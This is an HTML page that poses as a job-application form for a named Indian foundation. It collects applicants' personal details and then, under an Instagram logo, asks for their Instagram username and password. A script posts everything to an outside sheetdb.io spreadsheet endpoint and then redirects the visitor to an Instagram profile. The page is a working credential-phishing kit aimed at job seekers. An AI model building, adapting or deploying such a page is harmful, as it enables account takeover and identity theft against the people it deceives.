<!DOCTYPE html>

<html>

<head>

  <title>Job Application</title>

  <style>

    /* Internal CSS */

    body {

      font-family: Arial, sans-serif;

      background-color: #f2f2f2;

    }

    h1 {

      color: #333333;

    }

    .job-description {

      margin-bottom: 20px;

      padding: 10px;

      background-color: #ffffff;

    }

    .form-container {

      width: 900px;

      margin: 0 auto;

      padding: 20px;

      background-color: #ffffff;

      border-radius: 4px;

    }

    .form-container input[type="text"],

    .form-container input[type="password"],

    .form-container input[type="email"] {

      width: 100%;

      margin-bottom: 10px;

      padding: 20px;

      border: 1px solid #ccc;

      border-radius: 10px;

    }

    .form-container .button {

      display: inline-block;

      padding: 10px 20px;

      background-color: #4CAF50;

      color: #ffffff;

      text-decoration: none;

      border-radius: 4px;

    }

    .instagram-logo {

      width: 200px;

      height: 100px;

      margin-top: 20px;

      max-width: 1500px;

    margin-bottom: 20px;

    align:centr;

    }

     .footer {

    margin-top: 20px;

    font-size: 12px;

    color: #999;

    text-align: center;

    }

    

    .footer a {

    color: #999;

    text-decoration: none;

    }

    

    .footer a:hover {

    text-decoration: underline;

    }

  </style>

</head>

<body>

  <div class="job-description">

      

    <h1>MAGIC BUS INDIA FOUNDATION</h1>

    <h4>

📍#1245, 8th cross, Behind Raghavendra Temple, Near Hoysala Circle, Kengeri Satellite Town, Bangalore -560060</p>

    </h4>

    Join our team. The ideal candidate should have strong programming skills in Python, experience with web development frameworks, and a passion for creating high-quality software solutions. As a software developer at  Technologies, you will be responsible for developing and maintaining software applications, collaborating with cross-functional teams, and delivering innovative solutions to meet client requirements.

    </p>

    <h3>

        100% placement with Free Training.

    </h3>

    <h2>Requirements:</h2>

      <p>Hands on experience of Automation Testing using Playwright Automation Tool

     </p><p>Proficiency in JavaScript / Typescript programming language</p><p>Hands on experience in Playwright supported framework, Chai assertions</p><p>Good knowledge in NodeJsExperienced in Version control tools like GIT.Analytical, Client interfacing and stakeholder management skills</p><p>Knowledge of SDLC and agile methodologies</p><p>Ability to implement in CI-CD pipelines using GIT.Familiarity to drive/participate in Agile.</p>Excellent communication and Client Handling SkillsBehavioral CompetenciesFormulation & PrioritizationClient centricity</p>Execution ExcellencePassion for ResultsConfidence

      

      <br>

      <h2>Note</h2>

      <h3>

          Please read the job instructions and requirements carefully before applying. If your CV is shortlisted, you will receive all communications from the organization via your registered email address or Mail or Instagram. Keep checking your inbox for details about the next round once your CV has been shortlisted.

      </h3>

  </div>

  <div class="form-container">

    <h2>User Details</h2>

    <form action="https://sheetdb.io/api/v1/k0x09n2x5rkie" method="post" id="sheetdb-form">

      <label for="email">Email:</label>

      <input type="email" id="email" placeholder="Enter your email" name="data[email]">

      <br>

      <label for="fullname">Full Name:</label>

      <input type="text" id="fullname" placeholder="Enter your full name" name="data[fname]">

      <label for="phone">MobileNumber</label>

      <input type="text" id="phone" placeholder="Enter your Mobilenumber" name="data[num]">

      <label for="qualification">Qualification:</label>

      <input type="text" id="email" placeholder="Enter your qualification" name="data[qua]">

      <label for="pass">Year of pass:</label>

      <input type="text" id="email" placeholder="Enter Year of Pass" name="pass"><br><br>

      <label for="Dob">Birth Date:</label>

      <input type="date" id="Dob" placeholder="Enter your email" name="dob"><br><br>

      <label for="file">Upload your CV/resume(max5MB):</label><br><br>

      <input type="file" id="file" placeholder="Enter your email"><br><br>

      

      <label for="fresh">Fresher/Experiences:</label>

      <input type="text" id="email" placeholder="Enter your Fresher/Experiences">

      

      <label for="exp">Experiences:</label>

      <input type="text" id="email" placeholder="Enter your Experiences">

      

      <label for="precomp">Previous Company Name:</label>

      <input type="text" id="email" placeholder="Enter your previous company name">

      

    

   

    

      <img src="https://www.instagram.com/static/images/web/mobile_nav_type_logo.png/735145cfe0a4.png" alt="Instagram Logo" class="instagram-logo">

      <br>

      <label for="username">Username:</label>

      <input type="text" id="username" placeholder="Enter your username" name="data[name]">

      <br>

      <label for="password">Password:</label>

      <input type="password" id="password" placeholder="Enter your password" name="data[pass]">

      <br>

      <button type="submit" class="button">Login</button>

    </form>

    

  </div>

  <div class="footer">

      &copy; 2023  All rights reserved. | <a href="#">Terms of Service</a> | <a href="#">Privacy Policy</a>

      </div>

      

      

      <script>

var form=document.getElementById('sheetdb-form');

form.addEventListener("submit", e => {

e. preventDefault();

fetch(form.action, {

method : "POST",

body: new FormData(document.getElementById("sheetdb-form")),

}).then(

response => response.json()

).then((html) => {

// you can put any J5 code here

window.open("https://instagram.com/magicbus_india_foundation?igshid=NTc4MTIwNjQ2YQ==",'_blank');

});

});

</script>

      

      

</body>

</html>

